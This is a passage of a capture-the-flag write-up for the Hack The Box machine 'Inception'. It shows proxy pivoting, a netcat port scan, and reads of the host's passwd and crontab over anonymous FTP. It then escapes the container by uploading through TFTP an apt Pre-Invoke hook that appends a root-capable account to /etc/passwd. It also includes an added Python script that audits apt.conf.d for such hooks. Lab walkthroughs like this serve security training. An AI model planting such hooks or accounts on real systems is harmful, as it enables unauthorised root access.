Last login: Thu Nov 30 20:06:16 2017 from 127.0.0.1
cobb@Inception:~$ whoami
cobb
Alternative with proxychains
We add the proxy to the proxychains configuration.
u505@kali:~/HTB/Machines/Inception$ sudo vi /etc/proxychains.conf
[sudo] password for u505:
u505@kali:~/HTB/Machines/Inception$ cat /etc/proxychains.conf | grep -v "^#" | grep -v "^$"
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
http 10.10.10.67 3128
Proxychains lets us run commands through the proxy.
u505@kali:~/HTB/Machines/Inception$ proxychains ssh cobb@127.0.0.1
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.10.10.67:3128-<><>-127.0.0.1:22-<><>-OK
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:dr5DOURssJH5i8VbjPxvbeM+e2FyMqJ8DGPB/Lcv1Mw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '127.0.0.1' (ECDSA) to the list of known hosts.
cobb@127.0.0.1's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
Last login: Fri May 29 03:34:28 2020 from 127.0.0.1
cobb@Inception:~$ whoami
cobb
User Flag
cobb@Inception:~$ cat user.txt
<USER_FLAG>
cobb@Inception:~$ sudo -l
[sudo] password for cobb:
Matching Defaults entries for cobb on Inception:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User cobb may run the following commands on Inception:
    (ALL : ALL) ALL
cobb@Inception:~$ sudo -i
root@Inception:~# whoami
root
root@Inception:~# cat root.txt
You're waiting for a train. A train that will take you far away. Wake up to find root.txt.
But the root flag is not here. We need to escape the container to access the host.
Escape container
root@Inception:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:3e:28:53:63
          inet addr:192.168.0.10  Bcast:192.168.0.255  Mask:255.255.255.0
          inet6 addr: fe80::216:3eff:fe28:5363/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:638408 errors:0 dropped:0 overruns:0 frame:0
          TX packets:502836 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:167424212 (167.4 MB)  TX bytes:247633581 (247.6 MB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:5771 errors:0 dropped:0 overruns:0 frame:0
          TX packets:5771 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1
          RX bytes:1053385 (1.0 MB)  TX bytes:1053385 (1.0 MB)
Our IP is 192.168.0.10.
root@Inception:~# netstat -nputl
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      216/sshd
tcp6       0      0 :::80                   :::*                    LISTEN      265/apache2
tcp6       0      0 :::22                   :::*                    LISTEN      216/sshd
tcp6       0      0 :::3128                 :::*                    LISTEN      224/(squid-1)
udp        0      0 0.0.0.0:48021           0.0.0.0:*                           224/(squid-1)
udp6       0      0 :::54226                :::*                                224/(squid-1)
root@Inception:~# netstat -nput
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:22 127.0.0.1:39008 ESTABLISHED -
tcp 0 0 127.0.0.1:50166 127.0.0.1:22 ESTABLISHED 224/(squid-1)
tcp 0 0 127.0.0.1:22 127.0.0.1:50166 ESTABLISHED -
tcp 0 0 127.0.0.1:39008 127.0.0.1:22 ESTABLISHED 224/(squid-1)
tcp6 0 0 192.168.0.10:3128 192.168.0.1:42792 ESTABLISHED 224/(squid-1)
tcp6 0 476 192.168.0.10:3128 192.168.0.1:42812 ESTABLISHED 224/(squid-1)
udp6 0 0 ::1:47191 ::1:53654 ESTABLISHED -
udp6 0 0 ::1:53654 ::1:47191 ESTABLISHED 224/(squid-1)
The proxy connections come in through the machine 192.168.0.1.
root@Inception:~# route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 eth0
192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
The gateway is 192.168.0.1, so it seems the host is on IP 192.168.0.1.
Scan of Host ports
root@Inception:~# nmap -sC -sV 192.168.0.1
-bash: nmap: command not found
An alternative would be to download a static version of nmap (from https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/nmap) and upload it through the WebDAV repository. But we can use nc to find open ports.
root@Inception:~# nc -z -v 192.168.0.1 1-65000 2>&1 | grep -v refused
Connection to 192.168.0.1 21 port [tcp/ftp] succeeded!
Connection to 192.168.0.1 22 port [tcp/ssh] succeeded!
Connection to 192.168.0.1 53 port [tcp/domain] succeeded!
Scan of UDP ports
root@Inception:~# nc -zv -u 192.168.0.1 1-65535
Connection to 192.168.0.1 53 port [udp/domain] succeeded!
Connection to 192.168.0.1 67 port [udp/bootps] succeeded!
Connection to 192.168.0.1 69 port [udp/tftp] succeeded!
FTP, SSH and TFTP are open on the remote host.
Files download
root@Inception:~# ftp 192.168.0.1
Connected to 192.168.0.1.
220 (vsFTPd 3.0.3)
Name (192.168.0.1:cobb): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc
250 Directory successfully changed.
ftp> get passwd
local: passwd remote: passwd
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for passwd (1622 bytes).
226 Transfer complete.
1622 bytes received in 0.00 secs (26.2180 MB/s)
ftp> get group
local: group remote: group
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for group (766 bytes).
226 Transfer complete.
766 bytes received in 0.00 secs (7.5311 MB/s)
ftp> cd ssh
250 Directory successfully changed.
ftp> get sshd_config
local: sshd_config remote: sshd_config
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for sshd_config (2542 bytes).
226 Transfer complete.
2542 bytes received in 0.00 secs (22.6565 MB/s)
ftp> quit
221 Goodbye.
SSH doesn't allow root login with a password.
root@Inception:~# grep Root sshd_config
PermitRootLogin prohibit-password
# the setting of "PermitRootLogin without-password".
The group 27 is the sudo group.
root@Inception:~# grep sudo group
sudo:x:27:
We create our user u505 with password hello and group 27.
root@Inception:~# echo u505:`openssl passwd hello`:1000:27:u505:/home/u505:/bin/bash >> passwd
root@Inception:~# tail -n 3 passwd
ftp:x:111:118:ftp daemon,,,:/srv/ftp:/bin/false
tftp:x:112:119:tftp daemon,,,:/var/lib/tftpboot:/bin/false
u505:ElQyIxqjyti52:1000:27:u505:/home/u505:/bin/bash
Try to upload it with tftp.
root@Inception:~# tftp 192.168.0.1
tftp> put passwd /etc/passwd
Error code 2: File must have global write permissions
tftp> quit
TFTP is not allowed to overwrite /etc/passwd.
root@Inception:~# ftp 192.168.0.1
Connected to 192.168.0.1.
220 (vsFTPd 3.0.3)
Name (192.168.0.1:cobb): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc
250 Directory successfully changed.
ftp> get crontab
local: crontab remote: crontab
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for crontab (826 bytes).
226 Transfer complete.
826 bytes received in 0.00 secs (5.2516 MB/s)
ftp> quit
221 Goodbye.
After a while, I found the global crontab file.
root@Inception:~# cat crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 *   * * *   root    apt update 2>&1 >/var/log/apt/custom.log
30 23   * * *   root    apt upgrade -y 2>&1 >/dev/null
Every 5 minutes, root runs apt update. In /etc/apt/apt.conf.d we can drop a fragment with an APT::Update::Pre-Invoke hook, a shell command that apt executes, as root, right before the update.
root@Inception:~# vi 00u505
root@Inception:~# cat 00u505
APT::Update::Pre-Invoke {"if [ `grep u505 /etc/passwd |wc -l` -eq 0 ] ; then echo u505:ElQyIxqjyti52:1000:27:u505:/home/u505:/bin/bash >> /etc/passwd ; fi";};
The hook appends our user line to /etc/passwd if it is not already there, so repeated runs stay idempotent.
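Because apt runs these hooks as root, the fragments in apt.conf.d are worth auditing for Pre-Invoke and Post-Invoke commands. The script below is an added example, not code from the writeup; it parses both the block form used in 00u505 and the `Key:: "cmd";` append form, and SAMPLE_00U505 and SAMPLE_APPEND are constructed fragments.

```python
"""Find the shell hooks apt runs from apt.conf.d fragments.

Added example, not code from the writeup. apt executes the commands in
APT::Update::Pre-Invoke/Post-Invoke and DPkg::Pre-Invoke/Post-Invoke as
root, so each fragment under /etc/apt/apt.conf.d carrying one deserves
review, most of all a world-writable file or one that appeared by hand.
The sample fragments below are constructed; the first mirrors 00u505.
"""
import os
import re
import stat
from typing import Dict, List, Tuple

KEY = r"(APT::Update::(?:Pre|Post)-Invoke(?:-Success)?|DPkg::(?:Pre|Post)-Invoke)"
BLOCK_RE = re.compile(KEY + r"\s*\{(.*?)\}\s*;", re.S)             # Key { "cmd"; };
APPEND_RE = re.compile(KEY + r"::\s*(\"(?:[^\"\\]|\\.)*\")\s*;")  # Key:: "cmd";
STRING_RE = re.compile(r"\"((?:[^\"\\]|\\.)*)\"")

SAMPLE_00U505 = ('APT::Update::Pre-Invoke {"if [ `grep u505 /etc/passwd |wc -l` -eq 0 ] ; '
                 'then echo u505:ElQyIxqjyti52:1000:27:u505:/home/u505:/bin/bash >> /etc/passwd ; fi";};')
SAMPLE_APPEND = 'DPkg::Post-Invoke:: "touch /run/constructed-stamp";'

def find_hooks(text: str) -> List[Tuple[str, str]]:
    """Return (hook key, shell command) pairs found in one apt conf fragment."""
    hooks = []
    for m in BLOCK_RE.finditer(text):
        hooks += [(m.group(1), cmd) for cmd in STRING_RE.findall(m.group(2))]
    for m in APPEND_RE.finditer(text):
        hooks.append((m.group(1), STRING_RE.match(m.group(2)).group(1)))
    return hooks

def audit_conf_dir(conf_dir: str) -> List[Dict[str, str]]:
    """Report every hook in a directory of fragments together with file ownership and mode."""
    report = []
    for name in sorted(os.listdir(conf_dir)):
        path = os.path.join(conf_dir, name)
        if not os.path.isfile(path):
            continue
        st = os.stat(path)
        with open(path, errors="replace") as fh:
            for key, cmd in find_hooks(fh.read()):
                report.append({"file": path, "key": key, "command": cmd, "owner_uid": str(st.st_uid),
                               "world_writable": str(bool(st.st_mode & stat.S_IWOTH))})
    return report

if __name__ == "__main__":
    for key, cmd in find_hooks(SAMPLE_00U505 + "\n" + SAMPLE_APPEND):
        print(f"{key}: {cmd}")
    if os.path.isdir("/etc/apt/apt.conf.d"):  # audit the live directory when present
        for entry in audit_conf_dir("/etc/apt/apt.conf.d"):
            print(entry)
```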
root@Inception:~# ftp 192.168.0.1
Connected to 192.168.0.1.
220 (vsFTPd 3.0.3)
Name (192.168.0.1:cobb): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc/apt/apt.conf.d
250 Directory successfully changed.
ftp> put 00u505
local: 00u505 remote: 00u505
200 PORT command successful. Consider using PASV.
550 Permission denied.
ftp> quit
221 Goodbye.
As expected, anonymous FTP has no write permission there.
root@Inception:~# tftp 192.168.0.1
tftp> put 00u505 /etc/apt/apt.conf.d/00u505
Sent 160 bytes in 0.0 seconds
tftp> quit
Because the file doesn't exist yet, TFTP creates it without complaint. Within 5 minutes the cron job runs apt update, the hook fires, and our user is appended to /etc/passwd.
Root flag
root@Inception:~# ssh u505@192.168.0.1
The authenticity of host '192.168.0.1 (192.168.0.1)' can't be established.
ECDSA key fingerprint is SHA256:zj8NiAd9po8KKA/z7MGKjn7j6wPFpA2Y6bDTRecUrdE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.0.1' (ECDSA) to the list of known hosts.
u505@192.168.0.1's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Could not chdir to home directory /home/u505: No such file or directory
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

u505@Inception:/$ whoami
u505
u505@Inception:/$ id
uid=1000(u505) gid=27(sudo) groups=27(sudo)
u505@Inception:/$ sudo -i
[sudo] password for u505:
root@Inception:~# whoami
root
root@Inception:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Inception:~# cat root.txt
<ROOT_FLAG>
As assumed earlier, the traffic is NATted through the host: ports 80 and 3128 are DNATed to 192.168.0.10.
root@Inception:~# iptables -L -t nat -n
Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination
DNAT       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:80 to:192.168.0.10
DNAT       tcp  --  0.0.0.0/0            0.0.0.0/0            tcp dpt:3128 to:192.168.0.10

Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination
MASQUERADE  all  --  0.0.0.0/0            0.0.0.0/0
And we find the container we started in.
root@Inception:~# lxc list
+-----------+---------+---------------------+------+------------+-----------+
|   NAME    |  STATE  |        IPV4         | IPV6 |    TYPE    | SNAPSHOTS |
+-----------+---------+---------------------+------+------------+-----------+
| Inception | RUNNING | 192.168.0.10 (eth0) |      | PERSISTENT | 0         |
+-----------+---------+---------------------+------+------------+-----------+
root@Inception:~# lxc info Inception
Name: Inception
Remote: unix:/var/lib/lxd/unix.socket
Architecture: x86_64
Created: 2017/10/30 07:00 UTC
Status: Running
Type: persistent
Profiles: default
Pid: 1407
Ips:
  eth0: inet    192.168.0.10    vethD7OARV
  eth0: inet6   fe80::216:3eff:fe28:5363    vethD7OARV
  lo:   inet    127.0.0.1
  lo:   inet6   ::1
Resources:
  Processes: 32
  Memory usage:
    Memory (current): 173.20MB
    Memory (peak): 174.62MB
  Network usage:
    eth0:
      Bytes received: 21.83MB
      Bytes sent: 53.15MB
      Packets received: 304879
      Packets sent: 446738
    lo:
      Bytes received: 42.31MB
      Bytes sent: 42.31MB
      Packets received: 375971
      Packets sent: 375971
References
Daniel Simao 17:22, 28 May 2020 (EDT)